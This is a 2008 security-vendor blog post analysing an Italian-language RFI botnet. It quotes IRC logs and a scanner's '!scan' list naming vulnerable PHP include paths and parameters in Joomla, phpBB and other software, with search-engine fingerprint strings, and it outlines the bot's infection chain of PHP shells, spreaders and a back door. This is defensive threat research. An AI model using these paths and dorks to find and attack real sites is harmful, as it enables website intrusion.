Arbor Networks: Security to the Core

It all began innocently enough; I have been analyzing Apache logs for a while now, and when I spotted an RFI bot that was named “ddos.txt”, you know I had to look. After downloading it and analyzing it, I joined the channel with a copy of Bladerunner and started watching. The net’s been pretty quiet but here’s a few messages that came across, lately:

Tue Nov 11 00:11:14 2008
 @scan index.php?rage= index.php?rage=
...
Thu Nov 13 07:12:37 2008
 !scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
Thu Nov 13 07:12:37 2008
 !scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
Thu Nov 13 07:12:37 2008
 !scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
Thu Nov 13 07:12:37 2008
 !scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
Thu Nov 13 07:12:37 2008
 !scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
Thu Nov 13 07:12:37 2008
 !scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
Thu Nov 13 07:12:37 2008
 !scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
Thu Nov 13 07:12:40 2008
 !scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
Thu Nov 13 07:12:41 2008
 !scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
Thu Nov 13 07:12:43 2008
 !scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
...
Fri Nov 14 12:27:15 2008  4,12Ciao a tutti
Fri Nov 14 12:27:17 2008  4,12Arrivederci alla prox
...
Mon Nov 17 16:35:05 2008  hello
Mon Nov 17 18:54:45 2008  hello

Looks like Italian language hackers simply growing a botnet. No DDoS attacks launched, so far.

The channel topic instructs members (aka bots) to download three files. The first is one we’ll call “dork”. It’s basically a config file for an RFI scanner in Perl that takes a massive file (over 4300 scan commands) to spread the botnet. There’s simply no shortage of RFI vulnerabilities out there in various projects.

!scan /tellmatic/include/libchart-1.1/libchart.php?tm_includepath= "Tellmatic 1.0.7.1" "Tellmatic 1.0.7.1"
!scan esupport/admin/autoclose.php?subd= "Powered By Kayako eSupport" "Powered By Kayako eSupport"
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE" asia "PHP-NUKE" asia
!scan /index.php?skin_file= "powered by Mp3 ToolBox 1.0 beta 5" "powered by Mp3 ToolBox 1.0 beta 5"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" cz "zeroboard" cz
!scan /config.inc.php?path_escape= "XZero"
!scan mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" de "/mambots/content/" de
!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License"
!scan /tools/send_reminders.php?noSet=0&includedir= WebCalendar
!scan phprojekt/lib/lib.inc.php?path_pre= /phprojekt/
!scan phprojekt/lib/lib.inc.php?path_pre= copyright ?2000-2005 Albrecht Guenther
...

The second two URLs point to c57 and c99 PHP shells.

These all work with a Perl script which we’ll call “dork.pl”. Basically it works as such:

• Use search engines to find vulnerable system: Google, AllTheWeb, GigaBlast, AOL, Yahoo, MSN, ASK, FireBall
• Try and exploit the box:
  • First try a PHP ID script; if that works move on and mail the author that it worked
  • Next try and load a PHP shell on the box; if that works, mail and move on to the next step
  • Now try and get the first stage “spreader” on the box; again, mail and move on if successful
  • Finally try and get the second stage “spreader” on the box, mail if successful
• Once the box is exploited, all of the scripts are on the box: a PHP bot, a Perl bot (which is also an IRC bot, DDoS tool, and exploier), and PHP shells.

Quite the sloppy set up, very much slapped together. The code could use a good refactoring, as well, it has a lot of cut and paste going on. Crude but effective.

Once the PHP bot, in this case “ddos.txt”, drops and executes via the RFI exploit, it will drop another Perl script on the box, this one is a connect back door. It has the payload Base64 encoded in the PHP, so it simply opens a file in /tmp and drops it in there.

In this case, the bots connect to IndoIRC and maybe irc.irchighway.net; Neither network is terribly well known for its security practices and seem to tolerate or welcome botnet activities.

The great proliferation of RFI attacks, and the ease with which they can be tested and exploited with “frameworks” such as “dork.pl” should give you great pause. We often see Phishing sites set up on these boxes, and sometimes other nefarious activities hosted there, as well. When folks have hundreds of vulnerabilities and thousands of boxes to easily test them again, they’ll strike it rich quickly. Death by a thousand cuts, and now you can see how it happens.

This entry was posted on Wednesday, November 19th, 2008 at 10:58 am and is filed under Attacks, Backdoors, Exploit Code, Malware, Vulnerabilities. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.